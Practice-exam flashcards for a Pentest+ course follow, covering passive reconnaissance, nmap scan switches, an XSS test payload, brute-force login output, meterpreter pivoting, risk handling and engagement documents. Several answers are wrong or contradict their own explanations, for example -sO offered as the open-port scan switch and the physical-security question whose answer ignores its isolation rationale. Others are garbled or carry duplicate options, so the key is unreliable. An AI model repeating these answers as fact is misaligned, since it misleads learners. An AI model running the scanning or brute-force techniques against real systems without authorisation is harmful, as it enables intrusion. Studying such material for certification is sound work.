Jason Dion's Pentest+ Course Practice Exam Flashcards

Question 1

Q

A penetration tester hired by a bank began searching for the bank's IP ranges by performing lookups on the bank's DNS servers, reading news articles online about the bank, monitoring what times the bank's employees came into and left work, searching job postings (with a special focus on the bank's information technology jobs), and even searching the corporate office of the bank's dumpster. Based on this description, what portion of the penetration test is being conducted?
A.Information reporting
B.Vulnerability assessment
C.Passive information gathering
D.Active information gathering

Answer

A

C.Passive information gathering

Explanation

OBJ-2.1: Passive information gathering consists of numerous activities where the penetration tester gathers open-source or publicly available information without the organization under investigation being aware that the information has been accessed. Instead, active information gathering starts to probe the organization using techniques like DNS Enumeration, Port Scanning, and OS Fingerprinting. Vulnerability assessments are another form of active information gathering. Information reporting occurs after the penetration test is complete, and it involves writing a final report with the results, vulnerabilities, and lessons learned during the assessment.

Question 2

Q

An analyst just completed a port scan and received the following results of open ports:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

TCP: 80
TCP: 110
TCP: 443
TCP: 1433
TCP: 3306
TCP: 3389

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Based on these scan results, which of the following services are NOT currently operating?
A.Database
B.SSH
C.RDP
D.Web

Answer

A

B.SSH

Explanation

OBJ-2.1: Based on the port numbers shown as open in the nmap scan results, SSH is not currently operating. SSH operates over port 22. Web servers use port 80 for HTTP and 443 for HTTPS. Database servers run on port 1433 (Microsoft SQL) or 3306 (MySQL). Remote Desktop Protocol runs on port 3389.

Question 3

Q

What programming language is most vulnerable to buffer overflow attacks?
A.Java
B.Swift
C.C++
D.Python

Answer

A

C.C++

Explanation
OBJ-3.4: Many memory manipulation functions in C and C++ do not perform bounds checking and can easily overwrite the allocated bounds of the buffers they operate upon. Newer languages like Python, Java, and Swift do a better job of protecting against a buffer overflow, but even they are not perfect.

Question 4

Q

A security analyst wants to implement a layered defense posture for this network, so he uses multiple antivirus defensive layers, including both an end-user desktop antivirus software and an email gateway scanner. What kind of attack would this approach help to mitigate?
A.Scanning attack
B.Social engineering attack
C.Forensic attack
D.ARP spoofing attack

Answer

A

B.Social engineering attack

Explanation

OBJ-3.1: By utilizing both endpoint protection (desktop antivirus software) and the email gateway scanner, the security analyst works to prevent phishing and other social engineering attacks. Emails are a common attack vector used in social engineering attacks.

Question 5

Q

A pentester is trying to map the organization's internal network. The analyst enters the following command (nmap -n -sS -T4 -p 80 10.0.3.0/24). What type of scan is this?
A.Comprehensive Scan
B.Intense Scan
C.Quick Scan
D.Stealth Scan

Answer

A

D.Stealth Scan

Explanation:
Explanation

OBJ-4.1: In nmap, the -sS flag signifies a stealth scan. This is also known as an SYN scan and is the most popular scan option for good reasons. It can be performed quickly, scanning thousands of ports per second on a fast network, and is not hampered by restrictive firewalls. It is also relatively unobtrusive and stealthy since it never completes TCP connections.

Question 6

Q

When you are managing a risk, what is considered an acceptable option?
A.Mitigate it
B.Reject it
C.Initiate it
D.Deny it

Answer

A

A.Mitigate it

Explanation
OBJ-5.1: Mitigating a risk makes the effect of a risk a little less unpleasant, harmful, or serious. The majority of risk management is focused on mitigating risks down to an acceptable level of loss or risk.

Question 7

Q

alert(“This site is vulnerable to an attack!”)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Then, you clicked the search button, and a pop-up box appears on your screen showing the following text, “This site is vulnerable to an attack!” Based on this response, what vulnerability have you uncovered in the web application

A.Distributed Denial of Service
B.Buffer Overflow
C.Cross-site scripting
D.Cross-site request forgery

Answer

A

C.Cross-site scripting

Explanation:
OBJ-3.4: This is a form of Cross-Site Scripting (XSS). Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users. Attackers may use a cross-site scripting vulnerability to bypass access controls such as the same-origin policy. Cross-site request forgery (CSRF or XSRF) is a malicious exploit of a website where unauthorized commands are transmitted from a user that the web application trusts. There are many ways in which a malicious website can transmit commands, such as specially-crafted image tags, hidden forms, and JavaScript XMLHttpRequests can all work without the user’s interaction or even knowledge. A distributed denial-of-service (DDoS) attack is a malicious attempt to disrupt normal traffic of a targeted server, service, or network by overwhelming the target or its surrounding infrastructure with a flood of Internet traffic. A buffer overflow is an anomaly that occurs when a program overruns the buffer’s boundary and overwrites adjacent memory locations while writing data to a buffer.

Question 8

Q

Your organization's networks contain 4 subnets: 10.0.0.0, 10.0.1.0, 10.0.2.0, and 10.0.3.0. Using nmap, how can you scan all 4 subnets using a single command?
A.nmap -Pn 10.0.0.0/25
B.nmap -Pn 10.0.0.0,1.0,2.0,3.0
C.nmap -Pn 10.0.0.-3.0
D.nmap -Pn 10.0.0.0/23

Answer

A

C.nmap -Pn 10.0.0.-3.0

Explanation

OBJ-4.1: The simplest way to scan multiple subnets adjacent to each other is to use the -Pn tells the command to conduct a host-only scan of every IP in this target space. Using the dash (-) in the IP address means to scan “this network through this network.” So, 10.0.0-3.0 will scan every IP from 10.0.0.0 through 10.0.3.255.q

Question 9

Q

You walked up behind a penetration tester in your organization and saw the following output on their Kali Linux terminal:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

[ATTEMPT] target 192.168.1.142 – login “root” – pass “abcde” 1 of 10
[ATTEMPT] target 192.168.1.142 – login “root” – pass “efghi” 2 of 10
[ATTEMPT] target 192.168.1.142 – login “root” – pass “12345” 3 of 10
[ATTEMPT] target 192.168.1.142 – login “root” – pass “67890” 4 of 10
[ATTEMPT] target 192.168.1.142 – login “root” – pass “a1b2c” 5 of 10
[ATTEMPT] target 192.168.1.142 – login “user” – pass “abcde” 6 of 10
[ATTEMPT] target 192.168.1.142 – login “user” – pass “efghi” 7 of 10
[ATTEMPT] target 192.168.1.142 – login “user” – pass “12345” 8 of 10
[ATTEMPT] target 192.168.1.142 – login “user” – pass “67890” 9 of 10
[ATTEMPT] target 192.168.1.142 – login “user” – pass “a1b2c” 10 of 10

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

What type of test is the penetration tester currently conducting?
A.Conducting a brute force login attempt of a remote service of 192.168.1.142
B.Conducting a brute force login attempt of a remote service on 192.168.1.142
C.Conducting a ping sweep of 192.168.1.142/24
D.Conducting a Denial of Service attack on 192.168.1.142

Answer

A

B.Conducting a brute force login attempt of a remote service on 192.168.1.142

Explanation

OBJ-2.4: The penetration tester is attempting to conduct a brute force login attempt of a remote service on 192.168.1.142, as shown by the multiple login attempts with common usernames and passwords. A brute force attack attempts to crack a password or username or find a hidden web page, or find the key used to encrypt a message, using a trial and error approach and hoping, eventually, to guess correctly. Port Scanning is the name for the technique used to identify open ports and services available on a network host. A denial-of-service (DoS) attack occurs when legitimate users cannot access information systems, devices, or other network resources due to the actions of a malicious cyber threat actor. A ping sweep is a basic network scanning technique used to determine which range of IP addresses map to live hosts.

Question 10

Q

A security analyst conducts a nmap scan of a server and found that port 25 is open. What risk might this server be exposed to?
A.Web portal data leak
B.Clear text authentication
C.Open file/print sharing
D.Open mail relay

Answer

A

D.Open mail relay

Explanation:
OBJ-3.2: Port 25 is the default port for SMTP (Simple Message Transfer Protocol), which is used for sending an email. An active mail relay occurs when an SMTP server is configured in such a way that it allows anyone on the Internet to send email through it, not just mail originating from your known and trusted users. Spammers can exploit this type of vulnerability to use your email server for their own benefit. File/print sharing usually operates over ports 135, 139, and 445 on a Windows server. Web portals run on ports 80 and 443. Clear text authentication could occur using an unencrypted service, such as telnet (23), FTP (20/21), or the web (80).

Question 11

Q

What nmap switch would you use to perform operating system detection?
A.-OS
B.-sP
C.-O
D.-s0

Answer

A

C.-O

Explanation:
OBJ-4.1: The –O switch is used to tell nmap to conduct fingerprinting of the operating system based on the responses received during scanning. Nmap will then report on the suspected operating system of the scanned host. If you use –O –v, you will get additional details, as this runs the operating system scan in verbose mode. The -OS flag is made up and not supported by nmap. The -s0 flag conducts an IP protocol scan of the target. The -sP flag conducts a simple ping scan against the target.

Question 12

Q

An ethical hacker has been hired to conduct a physical penetration test of a company. During the first day of the test, the ethical hacker dresses up like a plumber and waits in the building's main lobby until an employee goes through the main turnstile. As soon as the employee enters his access number and proceeds to go through the turnstile, the ethical hacker follows them through the access gate. What type of attack did the ethical hacker utilize to access the restricted area of the building?
A.Shoulder surfing
B.Mantrap
C.Tailgating
D.Social engineering

Answer

A

C.Tailgating

Explanation

OBJ-3.6: Based on the description, the ethical hacker conducted a very specialized type of social engineering attack known as tailgating. Sometimes on a certification exam, there are two correct answers, but one is more correct. This question is an example of that concept. Tailgating involves someone who lacks the proper authentication following an employee into a restricted area. Social engineering uses deception to manipulate individuals into divulging confidential or personal information that may be used for fraudulent purposes. Shoulder surfing is a type of social engineering technique used to obtain personal identification numbers (PINs), passwords, and other confidential data by looking over the victim’s shoulder.

Question 13

Q

What command could be used to list the active services from the Windows command prompt?
A. sc query \\servername
B.sc config
C.sc query
D.sc query type= running

Answer

A

C.sc query

Explanation

OBJ-2.1: Windows uses the sc query to display information about the running service. It is part of the Service Control command-line tool, known as sc. The sc config command will modify the value of a service’s entries in the registry and the Service Control Manager database. The sc query command will obtain and display information about the specified service, driver, type of service, or driver type. By entering just the sc query, the command will return the information on the active services only. By using the type=running option, only the information on the running service will be displayed. If the command sc query \servername is used, then the remote server’s active services (\servername) will be displayed.

Question 14

Q

A penetration tester has been hired to conduct an assessment, but the company wants to exclude social engineering from the list of authorized activities. Which of the following documents would include this limitation?
A.Rules of engagement 
B.Memorandum of understanding
C.Service level agreement
D.Acceptable Use Policy

Answer

A

A.Rules of engagement

Explanation

OBJ-1.1: While the contract documents’ network scope will define what will be tested, the rules of engagement define how that testing is to occur. Rules of engagement can state things like no social engineering is allowed, no external website scanning, etc. A memorandum of understanding (MOU) is a preliminary or exploratory agreement to express an intent to work together that is not legally binding and does not involve monetary exchange. A service level agreement contains the operating procedures and standards for a service contract. An acceptable use policy is a policy that governs employees’ use of company equipment and internet services.

Question 15

Q

You are logged into the Windows command prompt and want to find what systems are alive in a portion of a Class B network (172.16.0.0/24) using ICMP. What command would best accomplish this?
A. for /L %X in (1 1 254) do PING -n 1 172.16.0.%X | FIND /I “REPLY”
B.ping 172.16.0.255
C. for %X in (1 1 255) do PING 172.16.0.%X
D.Ping 172.16.0.0

Answer

A

A. for /L %X in (1 1 254) do PING -n 1 172.16.0.%X | FIND /I “REPLY”

Explanation:
OBJ-4.4: The Windows command line does support some fundamental scripting, as shown in this answer. Use an iterative variable to set the starting value (start#) and then step through a set range of values until the value exceeds the set ending value (end#). /L will execute the iterative by comparing start# with end#. If start# is less than end#, the command will execute. When the iterative variable exceeds end#, the command shell exits the loop. You can also use a negative step# to step through a range in decreasing values. For example, (1,1,5) generates the sequence 1 2 3 4 5 and (5,-1,1) generates the sequence (5 4 3 2 1). The syntax is: “for /L %variable in (start# step# end#) do command [CommandLineOptions].”

Question 16

Q

What must be developed to show security improvements over time?
A.Reports
B.Testing Tools
C.Taxonomy of vulnerabilities
D.Metrrics

Answer

A

D.Metrrics

Explanation:
OBJ-5.1: Metrics are a method of measuring something over time. If you wish to show the effect of security improvements over time, creating metrics would be a good option. For example, you may wish to look at the number of unpatched and known vulnerabilities. As this number decreases, your network would be considered to have improved security. Reports and testing tools alone cannot show progress. You must have measurable results using metrics.

Question 17

Q

A penetration tester has exploited an FTP server using Metasploit and now wants to pivot to the organization’s LAN. What is the best method for the penetration tester to use to conduct the pivot?
A.Create a route statement in meterpreter
B.Set the payload to propagate through meterpreter
C.Issue the pivot exploit and setup meterpreter
D.Reconfigure the network settings in meterpreter

Answer

A

A.Create a route statement in meterpreter

Explanation:
OBJ-3.7: Since the penetration tester has exploited the FTP server from outside the LAN, they will need to set up a route statement in meterpreter. Metasploit makes this very simple since it also has an autoroute meterpreter script that will allow us to attack this second network through our first compromised machine (the FTP server) and then create the routes needed.

Question 18

Q

What results will the following command yield: NMAP -sS -O -p 80-443 145.18.24.7?
A.A stealth scan thats scans all open ports excluding ports 80 to 443
B.A stealth scan that scans ports 80 and 443
C.A stealth scan that scans all ports from 80 to 443 and determines a targets operating system
D.A stealth scan that scans ports 80 to 443

Answer

A

C.A stealth scan that scans all ports from 80 to 443 and determines a targets operating system

Explanation:
OBJ-4.1: When using NMAP, the -sS tells the tool to use a stealth scan using a TCP SYN packet, the -O is used to determine the operating system, and -p dictates which ports to scan. Since the ports were listed as 80-443, this indicates it includes all the ports from 80 through 443.

Question 19

Q

What is a formal document that states what will and will not be performed during a penetration test?
A.NDA
B.MSA
C.Corporate Policy
D.SOW

Answer

A

D.SOW

Explanation:
OBJ-1.2: The Scope of Work is a formal document stating what will and will not be performed during a penetration test. It should also contain the size and scope of the assessment and a list of the assessment’s objectives. A master service agreement, or MSA, is a contract reached between parties, in which the parties agree to most of the terms that will govern future transactions or future agreements. The MSA is used when a pentester will be on retainer for a multi-year contract, and an individual SOW will be issued for each assessment to define the individual scopes for each one. A non-disclosure agreement (NDA) is a legal contract between at least two parties that outlines confidential material, knowledge, or information that the parties wish to share for certain purposes but wish to restrict access. Corporate policy is a documented set of broad guidelines, formulated after analyzing all internal and external factors that can affect an organization’s objectives, operations, and plans.

Question 20

Q

A hacker successfully modified the sale price of items purchased through your company's web site. During the investigation that followed, the security analyst has verified the web server, and the Oracle database was not compromised directly. The analyst also found no attacks that could have caused this during their log verification of the Intrusion Detection System (IDS). What is the most likely method that the attacker used to change the items' sale price?
A.Changing hidden from values
B.Cross-site scripting
C.SQL injection
D.Buffer overflow attacl

Answer

A

A.Changing hidden from values

Explanation:
OBJ-3.4: Since there are no indications in the IDS logs, the database, or the server, it is most likely that the hacker changed hidden form values to change the items’ price in the shopping cart. A buffer overflow is an anomaly that occurs when a program overruns the buffer’s boundary and overwrites adjacent memory locations while writing data to a buffer. Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in a browser side script, to a different end-user. SQL injection is a code injection technique used to attack data-driven applications. Malicious SQL statements are inserted into an entry field for execution, such as dumping the database contents to the attacker.

Question 21

Q

What kind of attack is an example of IP spoofing?
A.ARP Poisoning
B.SQL Injections
C.Man-in-the-Middle
D.Cross-site scripting

Answer

A

C.Man-in-the-Middle

Explanation:
OBJ-3.2: The man-in-the-middle attack intercepts communications between two systems. For example, in an HTTP transaction, the target is the TCP connection between client and server. Using different techniques, the attacker splits the original TCP connection into 2 new connections, one between the client and the attacker and the other between the attacker and the server. This often uses IP spoofing to trick a victim into connecting to the attack. SQL injection is a code injection technique used to attack data-driven applications. Malicious SQL statements are inserted into an entry field for execution, such as dumping the database contents to the attacker. A man-in-the-middle attack (MITM) is an attack where the attacker secretly relays and possibly alters the communications between two parties who believe that they are directly communicating with each other. ARP Poisoning, also known as ARP Spoofing, is a type of cyber attack carried out over a Local Area Network (LAN) that involves sending malicious ARP packets to a default gateway on a LAN to change the pairings in its IP to MAC address table. Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in a browser side script, to a different end-user.

Question 22

Q

Which of the following is true concerning LM hashes?
A.LM hashes consist of 48 hexadecimal characters
B.LM Hases are based on AES128 cryptographic standard
C.LM Hashes are not generated when the password length exceeds 15 characters
D.Uppercase characters in the password are converted to lwoercase

Answer

A

C.LM Hashes are not generated when the password length exceeds 15 characters

Explanation:
OBJ-3.4: LM hash, also known as LanMan hash or LAN Manager hash, is a compromised password hashing function. This was the primary hash that Microsoft LAN Manager and Microsoft Windows versions before Windows NT used to store user passwords. Support for the legacy LAN Manager protocol continued in later versions of Windows for backward compatibility. Still, it was recommended by Microsoft to be turned off by administrators due to the LM hash’s weak strength. LM hashes are not generated when the password length exceeds 15 characters since it is stored as a 16-byte value.

Question 23

Q

What is not one of the three categories of solutions that all of the pentester's recommended mitigations should fall into?
A.Technology
B.Problems
C.People
D.PRocess

Answer

A

B.Problems

Explanation:
OBJ-5.3: All possible solutions can be categorized as People, Process, or Technology solutions.

Question 24

Q

An attacker was able to gain access to your organization's network closet while posing as an HVAC technician. While he was there, he installed a network sniffer in your switched network environment. The attacker now wants to sniff all of the packets in the network. What attack should he use?
A.Smurg
B.MAC Flood
C.Fraggle
D.Tear Drop

Answer

A

B.MAC Flood

Explanation:
OBJ-3.2: MAC flooding is a technique employed to compromise the security of switched network devices. The attack forcing legitimate MAC addresses out of the table of contents in the switch and forcing a unicast flooding behavior, potentially sending sensitive information to portions of the network where it is not normally intended to go. Essentially, since the switch table of contents is flooding with bad information, the switch could fail open and begin to act like a hub, broadcasting all the frames out of every port. This would allow the attacker to sniff all network packets since he is connected to one of those switch ports. A fraggle attack is a denial-of-service (DoS) attack that involves sending a large amount of spoofed UDP traffic to a router’s broadcast address within a network. A teardrop attack is a denial-of-service (DoS) attack that involves sending fragmented TCP packets to a target machine. The Smurf attack is a distributed denial-of-service attack. Large numbers of Internet Control Message Protocol (ICMP) packets with the intended victim’s spoofed source IP are broadcast to a computer network using an IP broadcast address.

Question 25

Q

What type of assessment seeks to validate a systems security posture against a particular checklist?
A.Compliance-based
B.Objective-based
C.Red team
D.Goal-based

Answer

A

A.Compliance-based

Explanation:
OBJ-1.3: Compliance-based assessments seek to validate a system against a given checklist. This could validate organizational policies, be risk-based, or be used to validate PCI-DSS compliance. Objective-based penetration testing approaches an objective from all angles to ensure that information remains secure. This testing more accurately simulates the attacks launched by a malicious party. Goal-based assessments use goals defined before the assessment begins, and the penetration tester works to achieve the goals. Once a goal is achieved, the penetration testers should determine how many unique ways the goal can be achieved. A red team is a group that helps organizations to improve themselves by providing opposition to the point of view of the organization that they are helping.

Question 26

Q

What tool can be used to scan a network to perform vulnerability checks and compliance auditing?
A.Nessus
B.NMAP
C.Metasploit
D.BeEF

Answer

A

A.Nessus

Explanation:
OBJ-4.2: Nessus is a popular vulnerability scanner. It can be used to check how vulnerable your network is by using various plugins to test for vulnerabilities. Also, Nessus can perform compliance auditing, like internal and external PCI DSS audit scans. The nmap tool is a port scanner. The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.

Question 27

Q

What term describes the amount of risk an organization is willing to accept?
A.Risk avoidance
B.Risk acceptance
C.Risk appetite
D.Risk mitigations

Answer

A

C.Risk appetite

Explanation:
OBJ-5.1: Risk appetite describes how much risk an organization is willing to accept. This is a crucial factor both in designing the assessment and determining the recommended mitigations. Risk mitigation is a strategy to prepare for and lessen the effects of threats faced by a data center. Risk mitigation refers to applying security controls to reduce the risk of a known vulnerability. Risk avoidance is the elimination of hazards, activities, and exposures that can negatively affect an organization’s assets. Risk acceptance is the act of accepting the identified risk and not taking additional actions to reduce the risk because the risk is low enough. Risk acceptance should only be done once an organization’s risk tolerance is defined and communicated amongst the decision-makers.

Question 28

Q

An attacker is searching in Google for Cisco VPN configuration files by using the filetype:pcf modifier. The attacker could locate several of these configuration files and now wants to decode any connectivity passwords that they might contain. What tool should the attacker use?
A.Nessus scripting engine
B.Cain and Abel
C.CUPP
D.Netcat

Answer

A

B.Cain and Abel

Explanation:
OBJ-4.2: Cain and Abel is a popular password cracking tool.  It can recover many password types using methods such as network packet sniffing, cracking various password hashes by using methods such as dictionary attacks, brute force, and cryptanalysis attacks. It also includes a module to conduct Cisco VPN Client Password Decoding too. CUPP is used to create password lists. Nessus is a vulnerability scanner. The netcat tool is used to create reverse shells for remote access.

Question 29

Q

A cybersecurity analyst at a mid-sized retail chain has been asked to determine how much information can be gathered from the store’s public webserver. The analyst opens up the terminal on his Kali Linux workstation and uses netcat to gather some information.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[root@kali] nc test.diontraining.com 80
HEAD / HTTP/1.1

HTTP/1.1 200 OK
Date: Sun, 12 Jun 2020 14:12:45 AST
Server: Apache/2.0.46 (Unix)   (Red Hat/Linux)
Last-modified: Thu, 16 Apr 2009 11:20:14 PST
ETgag: “1986-69b-123a4bc6”
Accept-Ranges: bytes
Content-Length: 6485
Connection: close
Content-Type: text/html

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

What type of action did the analyst perform, based on the command and response above?
A.SQL Injection
B.Querying the Whois database
C.Banner grabbing
D.Cross-site scripting

Answer

A

C.Banner grabbing

Explanation:
OBJ-2.1: The analyst conducted banner grabbing. Banner grabbing is a technique used to learn information about a computer system on a network and the services running on its open ports. In the question, the command “nc test.diontraining.com 80” was used to establish a connection to a target web server using netcat, then send an HTTP request (HEAD / HTTP/1.1). The response contains information about the service running on the webserver. In this example, the server software version (Apache 2.0.46) and the operating system (Red Hat Linux). Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in a browser side script, to a different end-user. SQL injection is a code injection technique used to attack data-driven applications where malicious SQL statements are inserted into an entry field for execution, such as dumping the database contents to the attacker. A query to the WHOIS database would return information on the website owner, not the operating system of the server.

Question 30

Q

A vulnerability scan has returned the following results:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Detailed Results
10.56.17.21 (APACHE-2.4)

Windows Shares
Category: Windows
CVE ID: -
Vendor Ref: -
Bugtraq ID: -
Service Modified - 8.30.2017

Enumeration Results:
print$ c:\windows\system32\spool\drivers
files c:\FileShare\Accounting
Temp c:\temp

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

What best describes the meaning of this output?
A.Windows Defender has a known exploit that must be resolved or patched
B.There is no CVE present, so this is a false positive caused by Apache running on a Windows server
C.Connecting to the host using a null session allows enumeration of the share names on the host
D.There is an unknown bug in an Apache server with no Bugtraq ID

Answer

A

C.Connecting to the host using a null session allows enumeration of the share names on the host

Explanation:
OBJ-2.2: This results from the vulnerability scan conducted shows an enumeration of open Windows shares on an Apache server. The enumeration results show three share names (print$, files, Temp) were found using a null session connection. There is no associated CVE with this vulnerability, but it is not a false positive. Not all vulnerabilities have a CVE associated with them. Nothing in this output indicates anything concerning Windows Defender, so this is not the correct answer. Bugtraq IDs are a different type of identification number issued for vulnerabilities by SecurityFocus. Generally, if there is a CVE, there will also be a Bugtraq ID. Both the CVE and Bugtraq ID being blank is not suspicious since we are dealing with a null enumeration result.

Question 31

Q

What nmap switch would a hacker use to attempt to see which ports are open on a targeted network?
A.-sU
B.-sO
C.-sS
D.-sP

Answer

A

B.-sO

Explanation:
OBJ-4.1: In nmap, the -sO flag is used to determine which IP protocols (TCP, UDP, ICMP, IGMP, etc.) are supported and open on the targeted machine the correct answer. The -sU flag will only scan UDP ports. The -sS flag will only scan TCP ports using an SYN scan. The -sP flag is a legacy (and depreciated) command for a ping scan.

Question 32

Q

What should be done NEXT if the final set of security controls does not eliminate all of the risks in a given system?
A.You should accept the risk if the residual risk is low enough
B.You should remove the current controls since they are not completely effective
C.You should continue to apply additional controls until there is zero risk
D.You should ignore any remain risk

Answer

A

A.You should accept the risk if the residual risk is low enough

Explanation:
OBJ-1.3: In most cases, you will be unable to remove all risk. Instead, it would be best to mitigate the risk to a low enough level to accept the residual risk. Removing the controls would add to the risk, which is a bad course of action to select. Ignoring the remaining risk is unacceptable; instead, you should acknowledge what risk remains and accept it if it is low enough. If it is not low enough, you should continue to mitigate the risk by adding additional control measures. It is unlikely you will ever be able to get all risk down to zero, but mitigating to a lower level and then accepting the residual risk is a common industry practice.

Question 33

Q

An electronics store was recently the victim of a robbery where an employee was injured, and some property was stolen. The store’s IT department hired an external supplier to expand its network to include a physical access control system. The system has video surveillance, intruder alarms, and remotely monitored locks using an appliance-based system. Which of the following long-term cybersecurity risks might occur based on these actions?

A.These devices should be isolated from the rest of the enterprise network
B.These devcies should be scanned for viruses before installation
C.There are no new risks due to the install and the company has a stronger physical security posture
D.These devices are insecure and should be isolated from the internet

Answer

A

B.These devcies should be scanned for viruses before installation

Explanation:
OBJ-1.3: While the physical security posture of the company has definitely been improved by adding the cameras, alarms, and locks, this appliance-based system may pose additional risks to the store’s network. Specialized technology and appliance-based systems rarely receive security updates at the same rate as regular servers or endpoints. These devices need to be on a network to ensure that their network functions can continue, but they don’t necessarily need to be on the enterprise production network. A good option would be to set up a parallel network that is physically or logically isolated from the enterprise network and install the video cameras, alarms, and lock on that one. These devices cannot be isolated from the internet without compromising their functions, such as allowing remote monitoring of the system and locks. The devices should be scanned for viruses before installation, but that is a short-term consideration and doesn’t protect them long-term.

Question 34

Q

What is a common Service Oriented Architecture Protocol (SOAP) vulnerability?
A.XML denial of service issue
B.SQL INjection
C.Xpath injection
D.Cross-site scripting

Answer

A

A.XML denial of service issue

Explanation:
OBJ-1.1: An XML denial of service (or XML bomb) attempts to pull in entities recursively in a defined DTD and explode the amount of memory used by the system until a denial of service condition occurs. Service-Oriented Architecture (SOA) is an architectural paradigm, and it aims to achieve a loose coupling amongst interacting distributed systems. SOA is used by enterprises to efficiently and cost-effectively integrate heterogeneous systems. However, SOA is affected by several security vulnerabilities, affecting the speed of its deployment in organizations. SOA is most commonly vulnerable to an XML denial of service. While the other options could be used as part of an attack on SOAP, the SOAP message itself is formatted as an XML document making an XML denial of service the most common vulnerability. While SOAP requests are vulnerable to SQL injections, this occurs by submitting a parameter as a morphed SQL query that can authenticate or reveal sensitive information as an attack on the underlying SQL. Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. XPath Injections operate on web sites that use user-supplied information to construct an XPath query for XML data.

Question 35

Q

A cybersecurity analyst is conducting a port scan of 192.168.1.45 using nmap. During the scan, the analyst found numerous ports open, and nmap could not determine the Operating System version of the system installed at 192.168.1.45. The analyst asks you to look over the results of their nmap scan results:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Starting NMAP 7.60 at 2020-06-12 21:23:15

NMAP scan report for 192.168.1.45
Host is up (0.78s latency).
Not shown: 992 closed ports

PORT  STATE  SERVICE
21/tcp open ftp
23/tcp open telnet
25/tcp open smtp
80/tcp open http
139/tcp open netbios-ssn
515/tcp open
631/tcp open ipp
9100/tcp open

MAC Address: 00:0C:29:18:6B:DB

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Which of the following operating systems is most likely used by the host?
A.Windows workstation
B.Linux server
C.Networked printer
D.Windows server

Answer

A

C.Networked printer

Explanation:
OBJ-4.1: Based on the open ports, it is likely that the host is a networked printer. Port 515 is used as an LPR/LPD port for most printers and older print servers. Port 631 is used for IPP for most modern printers and CUPS-based print servers. Port 9100 is used as a RAW port for most printers and is also known as the direct-IP port. If any of these three ports are found, the host is likely a printer. If ports 135, 139, 445 are found, this is usually a good indication of a Windows file server. Port such as FTP, telnet, SMTP, and http is used by both Windows and Linux servers; therefore, they are not as helpful to indicate which operating system is in use by the host.

Question 36

Q

An organization is currently accepting bids for a contract that will involve penetration testing and reporting. The organization is asking all bidders to provide proof of previous penetration testing and reporting experience. One contractor decides to print out a few reports from some previous penetration tests that they performed. What could have occurred as a result of this contractor’s actions?
A.The company accepting the bides will hire the contractor because of the quality of the reports he submitted with his bid
B.The contractor may have inadvertently exposed numerous vulnerabilities they had found at other companies on previous assessments
C.The contractor will have their bid accepted with a speical pay bonus because of their excellent work on previous penetration tests
D.The organization accepting the bids will want to use the reports as an example of the format for all bidders to use in the future

Answer

A

B.The contractor may have inadvertently exposed numerous vulnerabilities they had found at other companies on previous assessments

Explanation:
OBJ-1.2: Pentesters should never disclose any information from previous penetration tests to anyone outside of the assessed organization, per the original contract and scope of work. If the contractor wishes to provide a sample report, then the report should be created specifically for the contract and only include information from a sample/test network, not a previous customer’s assessment. This could also be in breach of the NDA between the pentester and the organization, as well.

Question 37

Q

\b[A-Za-z0-9_%+-]+@[A-Za-z0-9.-]+.[A-Za-z]{2,6}\b
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Which of the following strings would be included in the output of the search?
A.jason_dion@dion,training
B.support@diontraining.com
C.jason.dion@diontraining.com
D.www.diontraining.com

Answer

A

B.support@diontraining.com

Explanation:
OBJ-4.4: In the above REGEX, the \b parameter identifies that we are looking for whole words. The strategic use of the + operator indicates the three places where the word is broken into parts. The first part ([A-Za-z0-9%+-]” is composed of upper or lower case alphanumeric symbols “%+-.” After the first part of the word and the at sign (@) is specified, follows by another word ([A-Za-z0-9.-]), a period (.), and another purely alphabetic (non-numeric) string that is 2-6 characters in length. This finds a standard email format of something@something.com (but could be @something.co, @something.org, @something.money, or other options as long as the top-level domain is between 2 and 6 characters). The option of www.diontraining.com is wrong because it does not have an @ sign in the string. The option of jason.dion@diontraining.com is wrong because you cannot use a period before the @ symbol, only letters, numbers, and some specified symbols ( _ % + - ). The option of jason_dion@dion.training is wrong because the last word (training) is longer than 6 characters in length. As a cybersecurity analyst, you must get comfortable creating regular expressions and understanding what type of output they generate.

Question 38

Q

A firewall administrator has configured a new DMZ to allow public systems to be segmented from the organization’s internal network. The firewall now has three security zones set: Untrusted (Internet) [143.27.43.0/24]; DMZ (DMZ) [161.212.71.0/24]; Trusted (Intranet) [10.10.0.0/24]. The firewall administrator has been asked to enable remote desktop access from a fixed IP on the remote network to a remote desktop server in the DMZ for the Chief Security Officer to work from his home office after hours. The CSO’s home internet uses a static IP of 143.27.43.32. The remote desktop server is assigned a public-facing IP of 161.212.71.14. What rule should the administrator add to the firewall?

A.Permit 143.27.43.0/24 161.212.71.0/24 RDP 3389
B.Permit 143.27.43.32 161.212.71.14 RDP 3389
C.Permit 143.27.43.32 161.212.71.14 RDP 3389
C.Permit 143.27.43.0/24 161.212.71.14 RDP 3389
DPermit 143.27.43.32 161.212.71.0/24 RDP 3389

Answer

A

B.Permit 143.27.43.32 161.212.71.14 RDP 3389

